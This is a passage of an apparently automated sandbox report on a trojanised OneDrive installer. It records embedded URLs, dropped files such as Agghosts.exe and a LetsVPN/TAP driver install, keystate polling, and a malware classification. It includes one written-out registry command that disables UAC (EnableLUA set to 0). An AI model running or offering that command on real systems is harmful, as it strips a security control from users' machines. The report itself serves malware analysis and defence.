                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000002.00000003.1364654268.000001DA2385A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1371957915.000001DA2382B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference?client_type=gtag
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/sending-events?client_type
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typ
                Source: svchost.exe, 00000002.00000003.1365212374.000001DA2382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000002.00000003.1364756986.000001DA23843000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364498680.000001DA2385E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1371957915.000001DA2382B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2https://g.live.com/odclientsettings/MsitFastV2https:
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/InsidersV2RCHIT
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitFastV2ES-PC
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitSlowV2;.BAT
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkit
                Source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkitO
                Source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/dotnet
                Source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                Source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                Source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
                Source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
                Source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                Source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                Source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e772
                Source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e7728
                Source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 
00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                Source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime&
                Source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/wcf
                Source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnetprojects/SVGImage
                Source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/myuser/myrepo
                Source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms
                Source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2825583-killer-%E7%BD%91%E5%8D%A1%E9%9C%80%E8%A6%81%
                Source: bin.exe, 00000017.00000003.1671418506.0000000002733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
                Source: bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%B
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
                Source: bin.exe, 00000017.00000003.1671418506.0000000002733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2919829-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%BB%D1%83%
                Source: unknown HTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49714 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49722 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00405705
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_6CF46C4E __EH_prolog3,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,9_2_6CF46C4E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_6CEF7970 GetKeyState,GetKeyState,GetKeyState
                Source: Yara match File source: 59.2.LetsPRO.exe.68b70000.21.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: bin.exe PID: 736, type: MEMORYSTR
                Source: Yara match File source: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dll, type: DROPPED
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE857.tmp
                Source: C:\Users\Public\Videos\bin.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.cat
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB16.tmp
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.cat (copy)
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.cat (copy)

                System Summary

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Videos\bin.exe
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_007D77F0: DeviceIoControl
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                Source: C:\Users\Public\Videos\bin.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}
                Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\drvstore.tmp
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\inf\oem4.inf
                Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\SETF101.tmp
                Source: C:\Windows\System32\drvinst.exe File deleted: C:\Windows\System32\drivers\SETF101.tmp
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Process token adjusted: Load Driver
                Source: C:\Windows\System32\svchost.exe Process token adjusted: Security
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 10009E60 appears 58 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 6D0C9598 appears 133 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 00668422 appears 31 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 00662CA2 appears 35 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 00667509 appears 35 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 0066DB57 appears 42 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 00667FD6 appears 93 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 0066E4A8 appears 53 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 6D0C95CB appears 45 times
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: String function: 6D0C9670 appears 33 times
                Source: OneDriveSetup.exe Static PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 78359548 bytes, 1024 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 9812 datablocks, 0x1503 compression
                Source: System.Globalization.Extensions.dll.23.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: OneDriveSetup.exe Binary or memory string: OriginalFilename vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1303148868.000001F79493A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1285315080.000001F7954EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibcefur.dll: vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameZAM.exeD vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1308257134.000001F79493A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs OneDriveSetup.exe
                Source: OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameZAM.exeD vs OneDriveSetup.exe
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                Source: System.IO.Pipes.AccessControl.dll.23.dr, PipesAclExtensions.cs Security API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
                Source: System.IO.Pipes.AccessControl.dll.23.dr, PipesAclExtensions.cs Security API names: System.IO.Pipes.PipeStream.GetAccessControl()
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: directoryInfo.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: fileInfo.SetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: fileStream.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: fileInfo.GetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: directoryInfo.SetAccessControl
                Source: System.IO.FileSystem.AccessControl.dll.23.dr, FileSystemAclExtensions.cs Security API names: fileStream.SetAccessControl
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
                Source: classification engine Classification label: mal82.spre.spyw.evad.winEXE@101/292@11/14
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_00664601 FormatMessageA,GetLastError
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                Source: C:\Users\Public\Videos\bin.exe Code function: 23_2_004049B1 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_6CF0ED33 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_0071D260 GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\Public\Videos\bin.exe File created: C:\Program Files (x86)\letsvpn
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File created: C:\Users\Public\Music\20250413054815\
